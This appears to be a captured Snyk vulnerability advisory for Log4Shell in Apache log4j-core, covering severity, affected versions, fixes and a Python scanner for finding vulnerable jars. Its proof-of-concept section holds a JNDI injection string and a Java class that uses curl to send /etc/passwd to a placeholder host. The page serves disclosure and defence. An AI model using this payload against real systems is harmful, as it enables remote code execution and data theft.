
Submitted URL: https://email.snyk.io/c/eJyUkEGP2jAQhX-NfakcOeOJTQ4-pNCkUASoSFQ9jh1niUhCFAIr_v0KFnHgtHu139N87_PU9lS_dZaZnwygozYwAKYyBv...
Effective URL: https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720
Submission: On August 01 via api from US — Scanned from CA

REMOTE CODE EXECUTION (RCE) AFFECTING org.apache.logging.log4j:log4j-core
PACKAGE, VERSIONS [2.0-beta9,2.3.1) [2.4,2.12.2) [2.13.0,2.15.0)

⚠️
The Log4Shell critical vulnerability is widespread and currently being exploited
in the wild. Fix this issue as soon as possible. See our blog for details.

--------------------------------------------------------------------------------

SEVERITY

Recommended: 10.0 critical (CVSS assessment made by Snyk's security team)


THREAT INTELLIGENCE

 * Exploit Maturity: Mature
 * EPSS: 96.98% (100th percentile)

 * Snyk ID SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720
 * published 10 Dec 2021
 * disclosed 10 Dec 2021
 * credit Chen Zhaojun of Alibaba Cloud Security Team


INTRODUCED: 10 DEC 2021

CVE-2021-44228

CWE-94


HOW TO FIX?

Upgrade org.apache.logging.log4j:log4j-core to version 2.3.1, 2.12.2, 2.15.0 or
higher.

Use this guide to scan your projects for the Log4Shell vulnerability.


OVERVIEW

org.apache.logging.log4j:log4j-core is a logging library for Java.

Affected versions of this package are vulnerable to Remote Code Execution (RCE).
The Apache Log4j2 JNDI features used in configuration, log messages, and
parameters do not protect against attacker-controlled LDAP and other
JNDI-related endpoints. An attacker who can control log messages or log message
parameters can execute arbitrary code loaded from LDAP servers when message
lookup substitution is enabled.

From log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.


POC

When an application uses log4j to log user input, an attacker can exploit this
vulnerability by supplying a malicious string that the application logs, for
example ${jndi:ldap://someurl/Evil}. This causes the application to execute a
malicious class supplied by the attacker's LDAP server (someurl/Evil in this
example).

For example, the vulnerability can be used to inject this malicious class into
an application:

import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;

// Attacker-supplied object factory: the JNDI client in the vulnerable
// application instantiates it while resolving the ${jndi:ldap://...} lookup
// and calls getObjectInstance, so the command runs in the logging process.
public class Evil implements ObjectFactory {
   @Override
   public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
       // Reads /etc/passwd and posts it to the attacker's server (someurl is a placeholder)
       Runtime.getRuntime().exec("curl -F 'file=@/etc/passwd' https://someurl/upload");
       return null;
   }
}


This causes the application to read the /etc/passwd file on the system and
send it to a remote attacker.


FURTHER REMEDIATION OPTIONS

If upgrading the version is not possible, we strongly recommend mitigating the
vulnerability using one of these methods:

 * Remove JndiLookup.class from the class path (e.g. zip -q -d log4j-core-*.jar
   org/apache/logging/log4j/core/lookup/JndiLookup.class). While not pertinent
   to log4shell, consider also removing JndiManager, JMSAppender and
   SMTPAppender if you are not using them, as there are unconfirmed reports
   they could be leveraged in similar attacks in the future.
 * Partial mitigation: disable lookups via system properties or environment
   variables. If you use log4j >=2.10.0, you can set the system property
   log4j2.formatMsgNoLookups (i.e. -Dlog4j2.formatMsgNoLookups=true on the JVM
   command line) or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to
   true. (RCE is still possible in some non-default Pattern Layout
   configurations that use a Context Lookup or a Thread Context Map pattern.)
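The two remediation steps above reduce, for a defender, to an inventory
question over every archive a deployment ships: which log4j-core version is
inside, and has JndiLookup.class been stripped. The scanner below is an added
example written for this page; it is not Snyk's tooling and not the guide
linked above. It takes the affected ranges from the advisory heading, reads the
version from the Maven metadata file
META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties (an
assumption: the jar was built with Maven), and, going beyond the page, also
descends into jars nested inside WAR/EAR/fat-jar archives. The sample jars it
builds for testing are constructed fixtures, not real log4j artifacts.

```python
"""Inventory check for Log4Shell (CVE-2021-44228): which log4j-core versions
are present in an archive tree and whether JndiLookup.class has been removed.
Added example for this page; not Snyk's scanner."""
import io
import re
import sys
import zipfile

# Class the advisory says to strip from log4j-core as a mitigation.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Standard Maven metadata location inside the jar (assumption: Maven-built jar).
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED_ARCHIVES = (".jar", ".war", ".ear")

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?$")


def version_key(version):
    """Turn '2.0-beta9' / '2.14.1' into a sortable tuple; betas sort before finals.
    Returns None for strings this small grammar does not cover (e.g. '-rc1')."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        return None
    major, minor, patch, beta = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if beta else 1, int(beta or 0))


# Affected ranges copied from the advisory: [lo, hi), lo inclusive, hi exclusive.
AFFECTED_RANGES = [
    (version_key("2.0-beta9"), version_key("2.3.1")),
    (version_key("2.4"), version_key("2.12.2")),
    (version_key("2.13.0"), version_key("2.15.0")),
]


def is_affected_version(version):
    """True/False for a parseable version, None if it cannot be parsed."""
    k = version_key(version)
    if k is None:
        return None
    return any(lo <= k < hi for lo, hi in AFFECTED_RANGES)


def _log4j_core_version(zf):
    """Read 'version=...' from the jar's Maven pom.properties, or None."""
    try:
        props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_jar_bytes(data, path="<jar>"):
    """Return one finding per log4j-core found in the archive, recursing into
    nested jars (WAR/EAR/fat jar). Non-zip input yields no findings."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        version = _log4j_core_version(zf)
        has_lookup = JNDI_LOOKUP_CLASS in names
        if version is not None or has_lookup:
            affected = is_affected_version(version) if version else None
            if has_lookup:
                status = {True: "vulnerable", False: "fixed-version",
                          None: "unknown-version-with-jndilookup"}[affected]
            else:
                status = "mitigated-jndilookup-removed" if affected else "jndilookup-absent"
            findings.append({"path": path, "version": version,
                             "jndi_lookup": has_lookup, "status": status})
        for name in sorted(names):
            if name.lower().endswith(NESTED_ARCHIVES):
                findings.extend(scan_jar_bytes(zf.read(name), f"{path}!{name}"))
    return findings


def build_sample_jar(version, include_jndi_lookup=True):
    """Constructed fixture shaped like log4j-core-<version>.jar: only the Maven
    properties file and an empty stand-in for JndiLookup.class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    f"version={version}\ngroupId=org.apache.logging.log4j\n"
                    "artifactId=log4j-core\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")
    return buf.getvalue()


def wrap_in_archive(inner_bytes, inner_name):
    """Constructed fixture: embed a jar inside an outer archive (e.g. a WAR)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(inner_name, inner_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    for arg in sys.argv[1:]:
        with open(arg, "rb") as fh:
            for f in scan_jar_bytes(fh.read(), arg):
                print(f"{f['status']:32} {f['version'] or '?':10} {f['path']}")
```

Run it as python log4shell_scan.py app.war lib/*.jar. A result of
mitigated-jndilookup-removed means the class-stripping workaround from the first
bullet is in place; vulnerable means an affected version still carries the
lookup class. The scanner cannot see the non-default Pattern Layout cases the
second bullet warns about, so treat it as an inventory check rather than proof
that an application is safe.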


Upgrading your JDK version is not enough to mitigate this vulnerability in all
circumstances: it has been shown that setting the
com.sun.jndi.ldap.object.trustURLCodebase property to false is not sufficient.
For more remediation advice, please visit the Log4j Remediation Cheat Sheet
post.

Note: org.apache.logging.log4j:log4j-api was originally deemed vulnerable, but
Apache maintainers have since clarified that this only affects
org.apache.logging.log4j:log4j-core.



CVSS SCORES (version 3.1)

SNYK: 10 critical
 * Attack Vector (AV): Network
 * Attack Complexity (AC): Low
 * Privileges Required (PR): None
 * User Interaction (UI): None
 * Scope (S): Changed
 * Confidentiality (C): High
 * Integrity (I): High
 * Availability (A): High

NVD: 10 critical

RED HAT: 9.8 critical



© 2024 Snyk Limited
